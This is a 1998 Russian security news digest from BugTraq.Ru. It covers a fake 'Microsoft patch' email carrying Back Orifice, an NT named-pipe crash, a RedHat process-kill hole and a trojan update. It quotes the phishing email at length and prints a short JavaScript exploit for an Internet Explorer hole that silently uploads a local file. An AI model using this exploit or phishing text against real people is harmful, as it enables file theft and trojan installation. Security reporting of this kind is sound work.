BugTraq.Ru
Русский BugTraq
https://bugtraq.ru/review/archive/1998/24-11-98.html

24 ноября 1998, #51

И еще раз о круглом столе - в качестве напоминания. Собственно говоря, изменений никаких - он состоится 27 ноября в 1300, в мраморном зале ЦДЖ (Никитский бульвар, 8а). Желающим присутствовать просьба известить об этом заранее, желающим выступить - по возможности сообщить тему выступления.


В новостях NSP упоминается сообщение Радио России об организации в ФСБ управления компьютерной и информационной безопасности.

Судя по сообщению "Алгоритма", пока эта структура существует только на бумаге, а ее сотрудниками станут будущие выпускники Академии ФСБ, которых с этого года начали готовить в этом направлении.


Автор упомянутой в прошлом обзоре GirlFriend 1.3 сообщает о выходе новой версии - 1.3.5. Теперь она научилась не светиться в task menu, добавился Файл Менеджер. Chat.ru сейчас от меня в очередной раз недоступен, так что без подробностей.


Не так давно Microsoft очередной раз заявила, что не занимается распространением патчей к своим продуктам по e-mail. Поводом стало распространение писем якобы от службы поддержки MS с приаттаченными троянцами. На той неделе волна подобных писем, предлагающих поставить прилагемый ISPatch3.exe, прокатилась и у нас. Не далее как сегодня утром это письмо добралось до меня. Составлено оно достаточно убедительно для многих, особенно начинающих, пользователей:

[...]

Компания Microsoft предупреждает вас о том, что пренебрежение рекомендациями Microsoft может привести к несанкционированному доступу в ваш компьютер при работе в сетях Internet/Intranet. Последствиями такого проникновения может быть уничтожение или похищение вашей информации, включая коды доступа и пароли. Данная опасность не является следствием дефектов Microsoft Windows или Microsoft Internet Explorer 4.01, так как сохраняется при использовании любых Броузеров и почтовых агентов на любых операционных системах, использующих библиотеку winsock.dll.

Компания Microsoft рекомендует вам установить защитное исправление "Internet Security patch 03" (файл ISpatch3.exe) на всех компьютерах, имеющих подключение к сетям Internet/Intranet. Для большей защиты, ISpatch3 симулирует наличие программы "Sockets de Troie", что предотвращает заражение системы вирусами "Троянский конь".

Пользователи систем, аналогичных ОС Unix, и Интернет сервис провайдеры получают аналогичное исправление по специальному запросу, посланному по адресу отдела поддержки. В строке "Тема" необходимо указать: "Unix ISpatch Request".

[...]

Куда обратиться за помощью: microsoftsupport@usa.net - отдел поддержки Интернет защиты

[...]

Компания Microsoft, являющаяся владельцем сервера Netaddress, предлагает получить вам бесплатный почтовый ящик http://www.netaddress.com/?N=1 c адресами users@usa.net

Адрес солидный - usa, понимаешь, net, а ежели мы даже случайно знаем о существовании одной из самых известных халявных почтовых служб, то вполне можем поверить в ее покупку MS. Спокойно запускаем и получаем в одном флаконе старый добрый Back Orifice и Butt Trumpet, отправляющий извещение об успешной установке BO на все тот же microsoftsupport@usa.net.

Жаль вот только пользователей Unix и "Интернет сервис провайдеров", им-то что делать без юниксовой версии BO... :)


Тем временем оказалось, что счастье пользователей NT, утянувших себе 30 мегабайт четвертого Service Pack'а, было недолгим. Пора осваивать каталог .../NT40/hotfixes-postSP4/. Проблема на сей раз затаилась в именованных каналах (или по-простому, в named pipes). При открытии множественных каналов для связи с RPC-службами (например, SPOOLSS или LSASS) и отправке по ним мусора, служба пытается закрыть каждое такое соединение, при этом отбирается все больше ресурсов процессора, выделяется память, и в какой-то прекрасный момент система падает.


Не дает покоя Microsoft и Juan Carlos Garcia Cuartango. Предыдущая найденная им дырка в IE, которая была признана MS, и о которой я недавно писал, использовала команды document.execCommand("copy"), document.forms[0].filename.select() и document.execCommand("paste") для изменения имени закачиваемого на сервер файла. Новая модификация этой дырки, гордо названная The Son of Cuartango Hole, использует document.selection.createRange():
function getfile()
{
  document.forms[1].T1.select();
  document.execCommand("copy");
  document.forms[0].filename.select();
  var rng = document.selection.createRange();
  rng.execCommand("paste");
  document.forms[0].submit();
}


Надо будет как-нибудь собрать в отдельный выпуск русскоязычные сайты, посвященный различным вариантам Unix (а их уже немало, и весьма неплохих), а пока - Linux Information Links. Подборка новостей (свежий софт, свежие дырки в Linux и FreeBSD), лучших бесплатных программ; путеводители по сетевым протоколам и стандартам открытых систем, конференция, масса ссылок. Много внимания уделено вопросам безопасности: руководство "Как избежать проблем безопасности в своих программах", в тематическом каталоге подобрана информация из списков рассылки по компьютерной безопасности. Добротный сайт, оставляющий очень неплохое впечатление.


Дырка в RedHat 5.1. Любой залогинившийся пользователь (не обязательно root) может убить большинство запущенных процессов, вне зависимости от того, является ли он их владельцем.


БДИ (Безопасность, Достоверность, Информация) - журнал для тех, кто интересуется не только и не столько компьютерной безопасностью. Спецтехника, пожарная безопасность, частная охрана, обзор оружейных новинок. Изредка - статьи по информационной безопасности, носящие как правило достаточно обзорный характер. Материалы доступны в online начиная с последнего номера за прошлый год.


Уж не знаю, был ли это взлом или просто плюха, но в воскресенье на InfoArt'е была очень любопытная фотоинформация. Молчим, господа офицеры. Ссылку синхронно прислали Alexander Dvornik, Barmaglot и неизвестный герой.


У вас есть новость или ссылка, заслуживающие внимания наших читателей ? Пишите.

«     »




  Copyright © 2001-2022 Dmitry Leonov Design: Vadim Derkach